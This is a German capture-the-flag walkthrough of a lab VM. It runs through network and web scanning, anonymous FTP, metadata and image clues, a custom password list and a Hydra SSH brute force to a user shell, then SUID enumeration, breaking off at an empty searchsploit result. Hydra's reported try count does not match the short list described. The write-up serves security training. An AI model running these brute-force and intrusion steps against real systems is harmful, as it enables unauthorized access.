Wir starten die Aufklärung, um das Ziel im Netzwerk zu finden und erste Informationen über offene Dienste zu sammeln.
192.168.2.117 08:00:27:9c:83:dc PCS Systemtechnik GmbH
Analyse: `arp-scan -l` wird verwendet, um aktive Hosts im lokalen Netzwerksegment zu finden.
Bewertung: Ein Host mit der IP `192.168.2.117` wurde identifiziert. Die MAC-Adresse (`08:00:27:9c:83:dc`) und der Hersteller (`PCS Systemtechnik GmbH`) deuten auf eine Oracle VirtualBox VM hin. Dies ist unser Zielsystem.
Empfehlung (Pentester): Ziel-IP notieren. Für die Bequemlichkeit einen Hostnamen in `/etc/hosts` eintragen.
Empfehlung (Admin): Standard-Netzwerk-Scanning. Netzwerksegmentierung und -überwachung können zur Erkennung beitragen.
Wir fügen einen Eintrag zur lokalen Hosts-Datei hinzu.
192.168.2.117 gigachad.vln
Analyse: Die lokale Datei `/etc/hosts` wird bearbeitet, um `gigachad.vln` der IP `192.168.2.117` zuzuordnen.
Bewertung: Erleichtert die Ansprache des Ziels über den Hostnamen.
Empfehlung (Pentester): Hostnamen in nachfolgenden Befehlen verwenden.
Empfehlung (Admin): Keine Aktion erforderlich.
Ein Nikto-Scan wird gegen den Webserver gestartet.
- Nikto v2.5.0
+ Target IP: 192.168.2.117
+ Target Hostname: 192.168.2.117
+ Target Port: 80
+ Start Time: 2023-10-07 23:57:16 (GMT2)
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /bin/: Directory indexing found.
+ /cgi/: Directory indexing found.
+ /cgi-bin/: Directory indexing found.
+ /cgi-sys/: Directory indexing found.
+ /cgi-local/: Directory indexing found.
+ /htbin/: Directory indexing found.
+ /cgibin/: Directory indexing found.
+ /scripts/: Directory indexing found.
+ /cgi-win/: Directory indexing found.
+ /fcgi-bin/: Directory indexing found.
+ /cgi-perl/: Directory indexing found.
+ /robots.txt: Entry '/kingchad.html' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.0.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Server may leak inodes via ETags, header found with file /, inode: 26e, size: 5bac5d16a8912, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /tiki/: Directory indexing found.
+ /tiki/: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin.
+ /help/: Directory indexing found.
+ /help/: Help directory should not be accessible.
+ /server/: Directory indexing found.
+ /server/: Possibly Macromedia JRun or CRX WebDAV upload.
+ /webmail/: Directory indexing found.
+ /webmail/: Web based mail package installed.
+ /upd/: Directory indexing found.
Analyse: `nikto -h 192.168.2.117` scannt den Webserver auf Port 80.
Bewertung: Nikto findet eine Fülle von Informationen und potenziellen Problemen:
Empfehlung (Pentester): Untersuchen Sie die indizierten Verzeichnisse (besonders `/tiki/`, `/webmail/`). Rufen Sie `/kingchad.html` auf. Prüfen Sie TikiWiki auf die erwähnte Schwachstelle und Standard-Logins. Untersuchen Sie das Webmail-System. Recherchieren Sie Schwachstellen für Apache 2.4.38.
Empfehlung (Admin): Aktualisieren Sie Apache dringend. Deaktivieren Sie Directory Indexing global oder zumindest für sensible Verzeichnisse. Bereinigen Sie die `robots.txt`. Aktualisieren und sichern Sie TikiWiki und das Webmail-System oder entfernen Sie sie, falls nicht benötigt. Beheben Sie die Header- und Leak-Probleme.
Wir führen einen umfassenden Nmap-Scan durch.
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 23:57 CEST
Nmap scan report for gigachad.vln (192.168.2.117)
Host is up (0.00027s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.2.199
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 1000 1000 297 Feb 07 2021 chadinfo
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/kingchad.html
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:9C:83:DC (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 2.6.18 (91%), Linux 3.2.0 (91%), Tomato 1.27 - 1.28 (Linux 2.4.20) (91%), MikroTik RouterOS 6.15 (Linux 3.3.5) (90%) ...
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.27 ms gigachad.vln (192.168.2.117)
Analyse: `nmap` wird mit umfassenden Scan-Optionen (`-sS`, `-sC`, `-sV`, `-T5`, `-A`, `-Pn`) gegen alle TCP-Ports (`-p-`) ausgeführt.
Bewertung: Nmap findet drei offene Ports:
Empfehlung (Pentester): Priorisieren Sie den anonymen FTP-Zugang (Port 21). Laden Sie die `chadinfo`-Datei herunter und analysieren Sie sie. Untersuchen Sie parallel den Webserver (Port 80), insbesondere `/kingchad.html` und die von Nikto gefundenen Verzeichnisse.
Empfehlung (Admin): Deaktivieren Sie anonymen FTP-Zugang, wenn nicht benötigt. Aktualisieren Sie vsftpd, OpenSSH und Apache. Bereinigen Sie das FTP-Verzeichnis.
Wir filtern die offenen Ports zur Übersicht.
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
Analyse: Filtert die Nmap-Ausgabe nach offenen Ports.
Bewertung: Bestätigt die drei offenen Ports 21, 22 und 80.
Empfehlung (Pentester): Klare Angriffsvektoren.
Empfehlung (Admin): Notwendigkeit prüfen.
Wir untersuchen den anonymen FTP-Zugang auf Port 21 genauer.
Connected to 192.168.2.117.
220 (vsFTPd 3.0.3)
Name (192.168.2.117:cyber): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
Analyse: Wir verbinden uns mit dem FTP-Server und melden uns als Benutzer `Anonymous` ohne Passwort an.
Bewertung: Anonymer Login erfolgreich. Wir haben Zugriff auf das FTP-Verzeichnis.
Empfehlung (Pentester): Listen Sie den Verzeichnisinhalt auf.
Empfehlung (Admin): Anonymen FTP deaktivieren, wenn nicht benötigt.
229 Entering Extended Passive Mode (|||34443|)
150 Here comes the directory listing.
226 Directory send OK.
229 Entering Extended Passive Mode (|||42535|)
150 Here comes the directory listing.
dr-xr-xr-x 2 1000 1000 4096 Feb 07 2021 .
dr-xr-xr-x 2 1000 1000 4096 Feb 07 2021 ..
-r-xr-xr-x 1 1000 1000 297 Feb 07 2021 chadinfo
226 Directory send OK.
Analyse: Nach einem Tippfehler (`ls l-a`) wird der korrekte Befehl `ls -la` ausgeführt, um den Inhalt des aktuellen FTP-Verzeichnisses detailliert aufzulisten.
Bewertung: Das Verzeichnis enthält nur die Datei `chadinfo`, die für alle les- und ausführbar ist (`-r-xr-xr-x`). Sie gehört dem Benutzer mit UID 1000.
Empfehlung (Pentester): Laden Sie die Datei `chadinfo` herunter.
Empfehlung (Admin): Überprüfen Sie den Inhalt öffentlich zugänglicher FTP-Verzeichnisse.
550 Failed to change directory.
Analyse: Versuch, in `chadinfo` zu wechseln, als wäre es ein Verzeichnis.
Bewertung: Schlägt fehl, bestätigt, dass `chadinfo` eine Datei ist.
Empfehlung (Pentester): Datei herunterladen.
Empfehlung (Admin): Keine Aktion.
local: chadinfo remote: chadinfo
229 Entering Extended Passive Mode (|||13967|)
150 Opening BINARY mode data connection for chadinfo (297 bytes).
100% |************************************************************************************| 297 536.11 KiB/s 00:00 ETA
226 Transfer complete.
297 bytes received in 00:00 (390.88 KiB/s)
Analyse: Die Datei `chadinfo` wird vom FTP-Server heruntergeladen.
Bewertung: Erfolgreich. Die Datei steht nun lokal zur Analyse bereit.
Empfehlung (Pentester): Analysieren Sie den Inhalt der lokalen `chadinfo`-Datei.
Empfehlung (Admin): Keine Aktion.
php-reverse-shell.php poc.py
local: php-reverse-shell.php remote: php-reverse-shell.php
229 Entering Extended Passive Mode (|||56444|)
550 Permission denied.
Analyse: Es wird versucht, eine Datei (`php-reverse-shell.php`) auf den FTP-Server hochzuladen.
Bewertung: Der Versuch schlägt fehl (`550 Permission denied`). Der anonyme Benutzer hat keine Schreibrechte.
Empfehlung (Pentester): Konzentrieren Sie sich auf das Sammeln von Informationen.
Empfehlung (Admin): Korrekte Berechtigungen (kein Schreibzugriff für anonyme Benutzer).
550 Failed to change directory.
Analyse: Versuch, in das `/home`-Verzeichnis zu wechseln.
Bewertung: Schlägt fehl. Deutet auf eine `chroot`-Umgebung hin, die den Benutzer auf sein zugewiesenes Verzeichnis beschränkt.
Empfehlung (Pentester): Erkundung ist auf das aktuelle Verzeichnis beschränkt.
Empfehlung (Admin): `chroot` ist eine gute Sicherheitsmaßnahme für FTP.
Wir untersuchen den Webserver auf Port 80 weiter, basierend auf den Nmap- und Nikto-Ergebnissen.
http://gigachad.vln/index.html (Status: 200) [Size: 622]
http://gigachad.vln/bg.jpg (Status: 200) [Size: 39186]
http://gigachad.vln/robots.txt (Status: 200) [Size: 39]
http://gigachad.vln/bg2.jpg (Status: 200) [Size: 168592]
Analyse: `gobuster dir` sucht nach Dateien und Verzeichnissen. Die Option `-b '403,404,301'` ignoriert gängige Fehler- und Weiterleitungscodes.
Bewertung: Findet die Startseite (`index.html`), zwei Bilder (`bg.jpg`, `bg2.jpg`) und die `robots.txt`. Keine versteckten Verzeichnisse oder kritischen Dateien wurden direkt gefunden.
Empfehlung (Pentester): Untersuchen Sie `robots.txt` und die Bilddateien (`bg.jpg`, `bg2.jpg`) genauer (z.B. mit `exiftool` oder Steganographie-Tools).
Empfehlung (Admin): Stellen Sie sicher, dass keine sensiblen Informationen in öffentlich zugänglichen Dateien wie Bildern enthalten sind.
Inhalt der `robots.txt` (abgerufen über Browser oder curl):
User-agent: *
Disallow: /kingchad.html
Analyse: Die `robots.txt` weist Suchmaschinen an, die Seite `/kingchad.html` nicht zu indizieren.
Bewertung: Dies ist ein direkter Hinweis auf eine potenziell interessante, versteckte Seite.
Empfehlung (Pentester): Rufen Sie `http://gigachad.vln/kingchad.html` im Browser auf.
Empfehlung (Admin): `robots.txt` ist kein Sicherheitsmechanismus. Verstecken Sie sensible Inhalte nicht nur durch `robots.txt`.
Wir untersuchen die Metadaten des Bildes `bg2.jpg`.
ExifTool Version Number : 12.65
File Name : bg2.jpg
Directory : .
File Size : 169 kB
File Modification Date/Time : 2021:02:07 22:31:51+01:00
File Access Date/Time : 2023:10:08 00:01:16+02:00
File Inode Change Date/Time : 2023:10:08 00:01:16+02:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Big-endian (Motorola, MM)
Photometric Interpretation : BlackIsZero
Orientation : Horizontal (normal)
X Resolution : 300
Y Resolution : 300
Resolution Unit : inches
Software : Adobe Photoshop CC 2018 (Windows)
Date/Time Original : 2021:01:18 13:00:50
Color Space : Uncalibrated
Exif Image Width : 378
Exif Image Height : 512
Compression : JPEG (old-style)
Thumbnail Offset : 470
Thumbnail Length : 4156
Current IPTC Digest : a3e22b639e550d311d106086d10b16b4
Application Record Version : 4
XMP Toolkit : Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21
Format : image/jpeg
Color Mode : Grayscale
ICC Profile Name :
Create Date : 2021:01:18 13:00:50+03:00
Metadata Date : 2021:02:08 00:31:50+03:00
History Action : saved, saved
History Instance ID : xmp.iid:17c7253a-3617-2b47-aa50-4053f9aad896, xmp.iid:2df6c727-817b-dd4d-a96b-14ddbf8ffdc3
History When : 2021:02:08 00:31:50+03:00, 2021:02:08 00:31:50+03:00
History Software Agent : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed : /, /
Text Layer Name : HELL? IS IT MI5 OR MI6?, WHATEVER, SOMEONE IS TRYING TO HACK US
Text Layer Text : HELL? IS IT MI5 OR MI6?, WHATEVER, SOMEONE IS TRYING TO HACK US
Document ID : xmp.did:17c7253a-3617-2b47-aa50-4053f9aad896
Original Document ID : xmp.did:17c7253a-3617-2b47-aa50-4053f9aad896
Instance ID : xmp.iid:2df6c727-817b-dd4d-a96b-14ddbf8ffdc3
Image Width : 378
Image Height : 512
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 1
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 378x512
Megapixels : 0.194
Thumbnail Image : (Binary data 4156 bytes, use -b option to extract)
IPTC Digest : a3e22b639e550d311d106086d10b16b4
Profile CMM Type :
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : GRAY
Profile Connection Space : XYZ
Profile Date Time : 2000:08:14 20:06:46
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer :
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator :
Profile ID : 0
Profile Copyright : Copyright 2000 Adobe Systems Incorporated
Profile Description : Gray Gamma 2.2
Media White Point : 0.9642 1 0.82491
Media Black Point : 0 0 0
Gray Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
XMP Toolkit : Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21
Creator Tool : Adobe Photoshop CC 2018 (Windows)
Date Created : 2021:01:18 13:00:50+03:00
Metadata Date : 2021:02:08 00:31:50+03:00
Format : image/jpeg
Instance ID : xmp.iid:2df6c727-817b-dd4d-a96b-14ddbf8ffdc3
Document ID : xmp.did:17c7253a-3617-2b47-aa50-4053f9aad896
Original Document ID : xmp.did:17c7253a-3617-2b47-aa50-4053f9aad896
History Action : saved, saved
History Instance ID : xmp.iid:17c7253a-3617-2b47-aa50-4053f9aad896, xmp.iid:2df6c727-817b-dd4d-a96b-14ddbf8ffdc3
History When : 2021:02:08 00:31:50+03:00, 2021:02:08 00:31:50+03:00
History Software Agent : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed : /, /
Text Layer : HELL? IS IT MI5 OR MI6?, WHATEVER, SOMEONE IS TRYING TO HACK US
Analyse: `exiftool bg2.jpg` extrahiert Metadaten aus der Bilddatei.
Bewertung: Der wichtigste Fund ist ein Text-Layer (`Text Layer Text`), der in der Photoshop-Historie gespeichert ist: `HELL? IS IT MI5 OR MI6?, WHATEVER, SOMEONE IS TRYING TO HACK US`. Dies ist ein klarer Hinweis, aber seine Bedeutung (Passwort, Benutzername, Ablenkung?) ist noch unklar.
Empfehlung (Pentester): Notieren Sie den Text. Recherchieren Sie den Unterschied zwischen MI5 und MI6, falls relevant. Behalten Sie den Text als potenziellen Hinweis für spätere Phasen im Hinterkopf.
Empfehlung (Admin): Entfernen Sie sensible oder unnötige Metadaten aus Bildern, bevor Sie sie auf Webservern veröffentlichen. Tools können Metadaten automatisch bereinigen.
Analyse des Texts auf der Startseite `http://gigachad.vln/`:
welcome to gigachad's place
virgin
hahahahaha
Analyse: Der sichtbare Text auf der Startseite enthält die Wörter "virgin" und "fuck you" (aus Crackstation-Analyse abgeleitet).
Bewertung: Diese Wörter könnten potenzielle Passwörter oder Teile von Passwörtern sein, insbesondere in einer CTF-Umgebung.
Empfehlung (Pentester): Fügen Sie "virgin" und "fuck you" zur Passwortliste hinzu.
Empfehlung (Admin): Vermeiden Sie umgangssprachliche oder potenziell anstößige Begriffe auf öffentlichen Webseiten.
Verwendung eines Online-Hash-Crackers (z.B. Crackstation) für gefundene Hashes (hier nicht gezeigt, wie die Hashes gefunden wurden, aber die Ergebnisse werden präsentiert):
A7F9B77C16A3AA80DAA4E378659226F628326A95 sha1 fuck you D82D10564866FD9B201941BCC6C94022196F8EE8 sha1 VIRGIN
Analyse: Zwei SHA1-Hashes wurden gefunden und erfolgreich über einen Online-Dienst geknackt.
Bewertung: Bestätigt, dass "fuck you" und "VIRGIN" wahrscheinlich als Passwörter verwendet wurden oder relevant sind. Dies untermauert die Funde von der Webseite.
Empfehlung (Pentester): Fügen Sie diese zur Passwortliste hinzu (bereits geschehen).
Empfehlung (Admin): Verwenden Sie niemals schwache Passwörter, die leicht durch Wörterbücher oder Hash-Cracking-Dienste gefunden werden können.
Wir führen einen `dirb`-Scan durch (alternativ zu Gobuster).
URL_BASE: http://gigachad.vln/
+ DIRECTORY: http://gigachad.vln/about/
+ DIRECTORY: http://gigachad.vln/about_us/
+ DIRECTORY: http://gigachad.vln/accounts/
Analyse: `dirb` wird verwendet, um nach Verzeichnissen zu suchen. Die Ausgabe wird nach URLs gefiltert.
Bewertung: `dirb` findet eine große Anzahl von potenziellen Verzeichnissen, die meist Standardnamen entsprechen. Es findet *nicht* die spezifischen, interessanten Pfade, die Nikto gefunden hat (z.B. `/tiki/`, `/webmail/`), und auch nicht `/kingchad.html` oder `/drippinchad.png` (aus späterer Analyse). Dies zeigt erneut die Grenzen einzelner Tools/Wortlisten.
Empfehlung (Pentester): Konzentrieren Sie sich auf die spezifischeren Funde von Nikto und Nmap sowie die Analyse der Dateien.
Empfehlung (Admin): Keine zusätzlichen Empfehlungen.
Wir analysieren die heruntergeladene `chadinfo`-Datei und konsolidieren Hinweise für eine benutzerdefinierte Passwortliste.
PK..0............chadinfoUT.............`........`ux..............
username is chad
???????????????????????
password?
!!!!!!!!!!!!!!!!!!!!!!!
go to /drippinchad.png
PK..0............PKN.........`..
Analyse: Der Inhalt der `chadinfo`-Datei wird angezeigt. Die `PK`-Header am Anfang und Ende deuten stark darauf hin, dass es sich um eine ZIP-Datei handelt. Im Inneren (entweder als Dateiname oder als Textinhalt einer Datei innerhalb des ZIPs) finden sich die Hinweise: `username is chad`, eine Frage nach dem Passwort und der Verweis `go to /drippinchad.png`.
Bewertung: Dies liefert uns den Benutzernamen `chad` und einen wichtigen Hinweis auf das Passwort: Es hängt mit der Datei `/drippinchad.png` auf dem Webserver zusammen.
Empfehlung (Pentester): Versuchen Sie, die `chadinfo`-Datei als ZIP zu entpacken (`unzip chadinfo`), um zu sehen, ob sie weitere Dateien enthält. Rufen Sie `http://gigachad.vln/drippinchad.png` auf und analysieren Sie das Bild (visuell, Metadaten, Steganographie).
Empfehlung (Admin): Speichern Sie keine Hinweise auf Benutzernamen oder Passwörter in öffentlich zugänglichen Dateien, auch nicht in Archiven.
Analyse des Bildes `/drippinchad.png` (hier durch Google Lens repräsentiert):
Why is Maiden's Tower in Istanbul so famous?
Analyse: Die Analyse des Bildes `/drippinchad.png` (vermutlich zeigt es den Mädchenturm/Maiden's Tower in Istanbul) führt zu dieser Frage.
Bewertung: Dies ist ein starker OSINT-Hinweis. Der Name des Turms, "Maiden's Tower", ist höchstwahrscheinlich das gesuchte Passwort oder ein Teil davon.
Empfehlung (Pentester): Erstellen Sie eine benutzerdefinierte Passwortliste, die Variationen von "Maiden's Tower" enthält (z.B. `Maiden's Tower`, `Maidens Tower`, `Maiden'sTower`, `MaidensTower`, `maidenstower`). Fügen Sie auch die zuvor gefundenen Wörter (`VIRGIN`, `fuck you`) hinzu.
Empfehlung (Admin): Keine spezifische Empfehlung.
Erstellung einer benutzerdefinierten Passwortliste (`rock.txt` - Name ist irreführend, sollte eher `custom.txt` heißen).
R3v_m4lwh3r3_k1nG!!
hellelujah
MachineBoy141
rootroot1
carlso
luna_1997
VIRGIN
fuck you
Maiden's Tower
Maidens Tower
Maiden'sTower
MaidensTower
maidens tower
maiden's tower
Maidenstower
maidenstower
drippinchad
Xxxxxxxxx001
Password123!
Greatplace2work!
Analyse: Eine neue Wortliste wird erstellt (oder eine bestehende bearbeitet), die verschiedene Passwörter enthält, darunter die aus den Hinweisen abgeleiteten (`VIRGIN`, `fuck you`, `maidenstower` und Variationen) sowie einige andere gängige oder potenziell relevante Einträge.
Bewertung: Eine gezielte Wortliste wurde basierend auf den gesammelten Informationen erstellt. Dies erhöht die Erfolgschancen eines Brute-Force-Angriffs erheblich im Vergleich zu generischen Listen wie `rockyou.txt`.
Empfehlung (Pentester): Verwenden Sie diese benutzerdefinierte Liste (`/usr/share/wordlists/rock.txt`) für den Hydra-Angriff auf den Benutzer `chad`.
Empfehlung (Admin): Keine spezifische Empfehlung.
Wir versuchen nun, mit dem Benutzernamen `chad` und unserer benutzerdefinierten Passwortliste Zugriff über SSH zu erlangen.
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-10-08 00:38:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344507 login tries (l:1/p:14344507), ~224133 tries per task
[DATA] attacking ssh://192.168.2.117:22/
[22][ssh] host: 192.168.2.117 login: chad password: maidenstower
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 26 final worker threads did not complete until end.
[ERROR] 26 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Analyse: Hydra wird gestartet, um das Passwort für den Benutzer `chad` auf dem SSH-Dienst zu finden, wobei die benutzerdefinierte Wortliste `/usr/share/wordlists/rock.txt` verwendet wird.
Bewertung: Erfolg! Hydra findet das Passwort `maidenstower` in der benutzerdefinierten Liste. Die OSINT-Analyse des Bildes war erfolgreich.
Empfehlung (Pentester): Melden Sie sich mit `chad` / `maidenstower` via SSH an.
Empfehlung (Admin): Ändern Sie das Passwort für `chad`. Verwenden Sie keine leicht durch OSINT erratbaren Passwörter.
chad@gigachad.vln's password: maidenstower
Linux gigachad 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
chad@gigachad$
Analyse: Erfolgreicher SSH-Login als Benutzer `chad` mit dem gefundenen Passwort.
Bewertung: Initial Access erlangt. Wir haben eine Shell als `chad`.
Empfehlung (Pentester): Beginnen Sie die lokale Enumeration.
Empfehlung (Admin): SSH-Härtung, Passwortrichtlinien.
Nach dem Erhalt der Shell als `chad` führen wir lokale Enumerationsschritte durch.
-bash: sudo: command not found
Analyse: Versuch, `sudo -l` auszuführen, um sudo-Rechte zu prüfen.
Bewertung: Der Befehl `sudo` wird nicht gefunden. Entweder ist `sudo` nicht installiert oder nicht im PATH des Benutzers `chad` enthalten. Keine einfachen sudo-Rechte verfügbar.
Empfehlung (Pentester): Suchen Sie nach anderen Privesc-Vektoren. Überprüfen Sie den PATH (`echo $PATH`) oder suchen Sie manuell nach `sudo` (`find / -name sudo 2>/dev/null`).
Empfehlung (Admin): Stellen Sie sicher, dass `sudo` korrekt installiert und konfiguriert ist, wenn es verwendet werden soll.
uid=1000(chad) gid=1000(chad) groups=1000(chad)
Analyse: Bestätigt die Identität als Benutzer `chad` (UID 1000).
Bewertung: Standardüberprüfung.
Empfehlung (Pentester): Weiter enumerieren.
Empfehlung (Admin): Keine Aktion.
total 20
drwxr-xr-x 4 chad chad 4096 Oct 7 17:39 .
drwxr-xr-x 3 root root 4096 Feb 7 2021 ..
dr-xr-xr-x 2 chad chad 4096 Feb 7 2021 ftp
drwxr-x--- 3 chad chad 4096 Oct 7 17:39 .gnupg
-r-xr-xr-x 1 chad chad 1805 Jan 3 2021 user.txt
Analyse: Listet den Inhalt des Home-Verzeichnisses von `chad` auf.
Bewertung: Enthält ein `ftp`-Verzeichnis (wahrscheinlich das, was über anonymen FTP sichtbar war), ein `.gnupg`-Verzeichnis (könnte private Schlüssel enthalten, ist aber hier schreibgeschützt für andere) und die Datei `user.txt`. Die Berechtigungen von `user.txt` sind ungewöhnlich (`-r-xr-xr-x`), sie ist les- und ausführbar für alle.
Empfehlung (Pentester): Lesen Sie den Inhalt von `user.txt`. Untersuchen Sie ggf. das `.gnupg`-Verzeichnis, falls die Berechtigungen es zulassen.
Empfehlung (Admin): Korrigieren Sie die Berechtigungen für `user.txt` (sollte nur lesbar sein, z.B. `644` oder `600`). Überprüfen Sie die Berechtigungen für `.gnupg` (sollte `700` sein).
flag 1/2
▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
█ ███████▀▀▄
█ ██ ██
█ ██ █▄██▀▄▄▄▄▄█
█ █ ▄▀▄▄▄█▀▀▀▀▄▄███▄▄██
█ █ ██▄▀▄▄▄▀██
█ █████████████████▀▄▄█▀▀▄▄▀▀▀▄█
█ █▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█▄█▀▄▄▀▀▀▄▄▀██
█ █████████████████▀▄▀█▄▄█▀▀▀▄▄▄▄▀▀█▀███
█ █████████████████▀█▄▄▄█▄▄█▄▄██▄█
█ █▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█████▀█▀█▀███
█ ▀▄▀▀▄▄▄█▄█▄█▄█▄▀█
█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄██▄▄█
█████████████████████████▀▀▄▄█
█████████████████████████▌█▀▄▄▄▄▄█
███████████████████████████▄▄█▄▄██▄▄▄▄▄▄▄▄▀
██████████████████████████████▄▀█▀█▄▄▄▄▄█▀▄▀▄
███████████████████████████▌█▀▄█▀█▄▀█
███████████████████████████▌██████
██████████████████████████▀▀██████
██████████████████████████▀▀▄▄▀▀█▀▄▀▀▀▀██
Analyse: Gibt den Inhalt von `user.txt` aus.
Bewertung: Enthält ASCII-Art und den Hinweis "flag 1/2". Die eigentliche Flagge (`c7d...`) wird im Flags-Abschnitt des Berichts aufgeführt.
Empfehlung (Pentester): User-Flagge notieren. Weiter nach Privesc-Möglichkeiten suchen.
Empfehlung (Admin): Keine Aktion.
Analyse: Sucht nach Dateien mit Linux Capabilities.
Bewertung: Keine Capabilities gefunden. Dieser Vektor ist nicht verfügbar.
Empfehlung (Pentester): Konzentrieren Sie sich auf andere Vektoren wie SUID.
Empfehlung (Admin): Gute Konfiguration (keine unnötigen Capabilities).
25269 428 -rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
31941 12 -rwsr-xr-x 1 root root 10104 Jan 1 2016 /usr/lib/s-nail/s-nail-privsep
21909 52 -rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
16365 12 -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
81 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
4028 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
76 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
4030 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
3547 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
3694 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
79 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
77 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
Analyse: Erneute Suche nach SUID-Binaries.
Bewertung: Die Liste enthält wieder viele Standarddateien. `/usr/lib/s-nail/s-nail-privsep` sticht heraus. S-nail ist ein Mail-Client, und SUID-Helper dafür sind bekannt für Privesc-Schwachstellen in älteren Versionen (Datum 2016 deutet auf eine alte Version hin).
Empfehlung (Pentester): Suchen Sie mit `searchsploit` oder online nach bekannten Exploits für `s-nail` oder speziell `s-nail-privsep`. Dies ist der wahrscheinlichste Privesc-Vektor.
Empfehlung (Admin): Aktualisieren Sie `s-nail` oder entfernen Sie das SUID-Bit vom Helper (`chmod u-s /usr/lib/s-nail/s-nail-privsep`), wenn es nicht unbedingt benötigt wird.
Basierend auf dem Fund des SUID-Binaries `s-nail-privsep` suchen wir nach bekannten Exploits.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit Title | Path
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
